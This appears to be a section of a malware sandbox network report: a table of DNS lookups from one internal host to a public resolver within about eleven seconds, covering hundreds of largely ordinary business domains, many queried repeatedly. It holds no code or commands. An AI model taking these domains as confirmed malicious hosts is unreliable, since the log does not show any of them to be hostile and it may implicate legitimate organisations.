                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:42.734592915 CEST192.168.2.48.8.8.80x794bStandard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:42.824347019 CEST192.168.2.48.8.8.80xe899Standard query (0)a-domani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:43.048099041 CEST192.168.2.48.8.8.80xfcd6Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:43.174390078 CEST192.168.2.48.8.8.80x9419Standard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:43.234492064 CEST192.168.2.48.8.8.80xd06fStandard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:43.457176924 CEST192.168.2.48.8.8.80xe493Standard query (0)usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:43.492832899 CEST192.168.2.48.8.8.80x97f3Standard query (0)www.pb-games.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:43.529273987 CEST192.168.2.48.8.8.80x4c92Standard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:43.540301085 CEST192.168.2.48.8.8.80xe585Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:43.547614098 CEST192.168.2.48.8.8.80x2af4Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:43.713428974 CEST192.168.2.48.8.8.80x5263Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:43.923511028 CEST192.168.2.48.8.8.80x738fStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:44.012063980 CEST192.168.2.48.8.8.80xfb90Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:44.044013023 CEST192.168.2.48.8.8.80xbd1fStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:44.070303917 CEST192.168.2.48.8.8.80x767dStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:44.071835041 CEST192.168.2.48.8.8.80xc8b0Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:44.123105049 CEST192.168.2.48.8.8.80x7b62Standard query (0)lyto.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:44.206916094 CEST192.168.2.48.8.8.80x7d84Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:44.210980892 CEST192.168.2.48.8.8.80xa054Standard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:44.427340984 CEST192.168.2.48.8.8.80xed8cStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:44.449793100 CEST192.168.2.48.8.8.80x8e14Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:44.470742941 CEST192.168.2.48.8.8.80xf0faStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:44.556821108 CEST192.168.2.48.8.8.80xc02Standard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:44.755880117 CEST192.168.2.48.8.8.80xfc3bStandard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:44.810472965 CEST192.168.2.48.8.8.80x3ebeStandard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:44.822138071 CEST192.168.2.48.8.8.80x790aStandard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:44.838010073 CEST192.168.2.48.8.8.80x4e97Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:44.883155107 CEST192.168.2.48.8.8.80x5d02Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:44.924230099 CEST192.168.2.48.8.8.80x79a8Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:44.937849045 CEST192.168.2.48.8.8.80x3ddfStandard query (0)dataform.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:45.094862938 CEST192.168.2.48.8.8.80x767dStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:45.197143078 CEST192.168.2.48.8.8.80x41f9Standard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:45.387728930 CEST192.168.2.48.8.8.80x792Standard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:45.392947912 CEST192.168.2.48.8.8.80x7748Standard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:45.428936005 CEST192.168.2.48.8.8.80xeef6Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:45.504739046 CEST192.168.2.48.8.8.80xb697Standard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:45.991725922 CEST192.168.2.48.8.8.80x4e97Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:46.080826998 CEST192.168.2.48.8.8.80x8af8Standard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:46.208949089 CEST192.168.2.48.8.8.80x767dStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:46.213793039 CEST192.168.2.48.8.8.80x3c1bStandard query (0)kustnara.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:46.363878012 CEST192.168.2.48.8.8.80xe9b2Standard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:46.468297958 CEST192.168.2.48.8.8.80xf157Standard query (0)t-mould.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:47.140252113 CEST192.168.2.48.8.8.80x4e97Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:47.315196991 CEST192.168.2.48.8.8.80x37a3Standard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:47.636322021 CEST192.168.2.48.8.8.80xb62dStandard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:48.495238066 CEST192.168.2.48.8.8.80x767dStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:48.612505913 CEST192.168.2.48.8.8.80x1b77Standard query (0)holp-ai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:48.620377064 CEST192.168.2.48.8.8.80xb1c5Standard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:48.695909977 CEST192.168.2.48.8.8.80x9180Standard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:48.877295017 CEST192.168.2.48.8.8.80xb937Standard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:48.882344007 CEST192.168.2.48.8.8.80xa346Standard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:49.121680975 CEST192.168.2.48.8.8.80xbf9bStandard query (0)gujarat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:49.201818943 CEST192.168.2.48.8.8.80x4e97Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:49.583307981 CEST192.168.2.48.8.8.80xb547Standard query (0)unicus.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:49.629272938 CEST192.168.2.48.8.8.80x61b9Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:49.679923058 CEST192.168.2.48.8.8.80xf7f4Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:49.680392027 CEST192.168.2.48.8.8.80x4d67Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:49.732597113 CEST192.168.2.48.8.8.80x18b7Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:49.888748884 CEST192.168.2.48.8.8.80xacccStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:50.302149057 CEST192.168.2.48.8.8.80xbb1Standard query (0)www.tyrns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:50.319371939 CEST192.168.2.48.8.8.80x18a5Standard query (0)www.pohlfood.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:50.338809967 CEST192.168.2.48.8.8.80x3396Standard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:50.372631073 CEST192.168.2.48.8.8.80x8e71Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:50.689606905 CEST192.168.2.48.8.8.80xd3f5Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:50.689807892 CEST192.168.2.48.8.8.80xa658Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:50.691625118 CEST192.168.2.48.8.8.80x41deStandard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:50.696958065 CEST192.168.2.48.8.8.80x51a7Standard query (0)ikulani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:50.700620890 CEST192.168.2.48.8.8.80xf38bStandard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:50.705864906 CEST192.168.2.48.8.8.80xcad2Standard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:50.707709074 CEST192.168.2.48.8.8.80x91eaStandard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:50.768599033 CEST192.168.2.48.8.8.80xe681Standard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:50.847507954 CEST192.168.2.48.8.8.80x829aStandard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:50.923907042 CEST192.168.2.48.8.8.80xacccStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.029666901 CEST192.168.2.48.8.8.80x4b35Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.082413912 CEST192.168.2.48.8.8.80x9afeStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.087491035 CEST192.168.2.48.8.8.80x5d5bStandard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.087491035 CEST192.168.2.48.8.8.80x34a9Standard query (0)bigzz.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.102916002 CEST192.168.2.48.8.8.80x3317Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.106533051 CEST192.168.2.48.8.8.80x130cStandard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.117551088 CEST192.168.2.48.8.8.80xfcd0Standard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.147008896 CEST192.168.2.48.8.8.80x69beStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.244323015 CEST192.168.2.48.8.8.80xe06cStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.248980045 CEST192.168.2.48.8.8.80x9136Standard query (0)xsui.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.253117085 CEST192.168.2.48.8.8.80x530dStandard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.308094025 CEST192.168.2.48.8.8.80xfd49Standard query (0)4locals.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.365149021 CEST192.168.2.48.8.8.80x3deStandard query (0)snf.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.393491030 CEST192.168.2.48.8.8.80x29dcStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.655493975 CEST192.168.2.48.8.8.80xc9c5Standard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.690351963 CEST192.168.2.48.8.8.80xf2f4Standard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.700187922 CEST192.168.2.48.8.8.80x20bStandard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.708049059 CEST192.168.2.48.8.8.80xb40bStandard query (0)zupraha.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.713129044 CEST192.168.2.48.8.8.80xc11eStandard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.718707085 CEST192.168.2.48.8.8.80xa948Standard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.721770048 CEST192.168.2.48.8.8.80x6e44Standard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.726819038 CEST192.168.2.48.8.8.80xac32Standard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.756501913 CEST192.168.2.48.8.8.80xf3d3Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.769799948 CEST192.168.2.48.8.8.80xa651Standard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.797362089 CEST192.168.2.48.8.8.80xc35eStandard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.854068041 CEST192.168.2.48.8.8.80x6bc1Standard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.854130983 CEST192.168.2.48.8.8.80x18a9Standard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.854403019 CEST192.168.2.48.8.8.80x123Standard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.877528906 CEST192.168.2.48.8.8.80xdd6bStandard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.879492998 CEST192.168.2.48.8.8.80xf3b2Standard query (0)bigzz.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.880559921 CEST192.168.2.48.8.8.80x3a13Standard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.985508919 CEST192.168.2.48.8.8.80xacccStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:51.988178015 CEST192.168.2.48.8.8.80x44fdStandard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.107866049 CEST192.168.2.48.8.8.80xe3feStandard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.136112928 CEST192.168.2.48.8.8.80x135dStandard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.141781092 CEST192.168.2.48.8.8.80xa20eStandard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.165045977 CEST192.168.2.48.8.8.80xcac0Standard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.169969082 CEST192.168.2.48.8.8.80xe702Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.171225071 CEST192.168.2.48.8.8.80xbde4Standard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.178143978 CEST192.168.2.48.8.8.80x6b7aStandard query (0)avse.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.182728052 CEST192.168.2.48.8.8.80x7718Standard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.184741020 CEST192.168.2.48.8.8.80xe064Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.185017109 CEST192.168.2.48.8.8.80x4e50Standard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.218349934 CEST192.168.2.48.8.8.80xf1deStandard query (0)floopis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.218424082 CEST192.168.2.48.8.8.80x985bStandard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.254302979 CEST192.168.2.48.8.8.80x563Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.288517952 CEST192.168.2.48.8.8.80x8310Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.295378923 CEST192.168.2.48.8.8.80x338Standard query (0)oh28ya.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.347827911 CEST192.168.2.48.8.8.80x4fa4Standard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.384145021 CEST192.168.2.48.8.8.80x4057Standard query (0)lyto.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.384145021 CEST192.168.2.48.8.8.80x22abStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.393297911 CEST192.168.2.48.8.8.80xc822Standard query (0)karila.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.441598892 CEST192.168.2.48.8.8.80x2e00Standard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.442198992 CEST192.168.2.48.8.8.80x80cStandard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.442617893 CEST192.168.2.48.8.8.80xdbb1Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.443361044 CEST192.168.2.48.8.8.80x6ff5Standard query (0)a-domani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.463471889 CEST192.168.2.48.8.8.80x7c53Standard query (0)coxkitchensandbaths.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.470712900 CEST192.168.2.48.8.8.80x2148Standard query (0)sigtoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.477886915 CEST192.168.2.48.8.8.80x632aStandard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.486812115 CEST192.168.2.48.8.8.80x8049Standard query (0)metaforacom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.514657974 CEST192.168.2.48.8.8.80x9a84Standard query (0)yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.540502071 CEST192.168.2.48.8.8.80xcefStandard query (0)wahw.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.713541985 CEST192.168.2.48.8.8.80x4c07Standard query (0)ruzee.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.724783897 CEST192.168.2.48.8.8.80xdf93Standard query (0)gydrozo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.729507923 CEST192.168.2.48.8.8.80x7305Standard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.737977982 CEST192.168.2.48.8.8.80x35Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.749082088 CEST192.168.2.48.8.8.80xb40bStandard query (0)zupraha.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.755970955 CEST192.168.2.48.8.8.80x66f0Standard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.759390116 CEST192.168.2.48.8.8.80xbc20Standard query (0)akdeniz.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.759601116 CEST192.168.2.48.8.8.80x966fStandard query (0)rast.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.765135050 CEST192.168.2.48.8.8.80x7c3dStandard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.774521112 CEST192.168.2.48.8.8.80x5cd3Standard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.788849115 CEST192.168.2.48.8.8.80x9372Standard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.788849115 CEST192.168.2.48.8.8.80x201fStandard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.794588089 CEST192.168.2.48.8.8.80xf00Standard query (0)xsui.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.798573971 CEST192.168.2.48.8.8.80x7602Standard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.800030947 CEST192.168.2.48.8.8.80xd709Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.800653934 CEST192.168.2.48.8.8.80x419bStandard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.870748997 CEST192.168.2.48.8.8.80x7a5aStandard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.879826069 CEST192.168.2.48.8.8.80x8e15Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.882278919 CEST192.168.2.48.8.8.80xf44dStandard query (0)ramkome.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.889750004 CEST192.168.2.48.8.8.80xa827Standard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.916814089 CEST192.168.2.48.8.8.80xf2d4Standard query (0)floopis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.918050051 CEST192.168.2.48.8.8.80x74Standard query (0)oh28ya.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.926290035 CEST192.168.2.48.8.8.80x9827Standard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.976619959 CEST192.168.2.48.8.8.80x7361Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.980928898 CEST192.168.2.48.8.8.80x4002Standard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:52.990448952 CEST192.168.2.48.8.8.80x6bc1Standard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.006179094 CEST192.168.2.48.8.8.80xbedcStandard query (0)muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.041941881 CEST192.168.2.48.8.8.80xa7dcStandard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.050553083 CEST192.168.2.48.8.8.80x3f5eStandard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.063098907 CEST192.168.2.48.8.8.80xf8c4Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.066014051 CEST192.168.2.48.8.8.80x72beStandard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.073553085 CEST192.168.2.48.8.8.80xead1Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.081686974 CEST192.168.2.48.8.8.80xe4dcStandard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.098874092 CEST192.168.2.48.8.8.80x679Standard query (0)bossinst.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.119254112 CEST192.168.2.48.8.8.80xaaa3Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.119673967 CEST192.168.2.48.8.8.80x2b76Standard query (0)anduran.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.120202065 CEST192.168.2.48.8.8.80x6e72Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.131314039 CEST192.168.2.48.8.8.80x8c70Standard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.135896921 CEST192.168.2.48.8.8.80x9237Standard query (0)geecl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.139825106 CEST192.168.2.48.8.8.80xd85aStandard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:53.140146017 CEST192.168.2.48.8.8.80xba7dStandard query (0)avse.huA (IP address)IN (0x0001)false
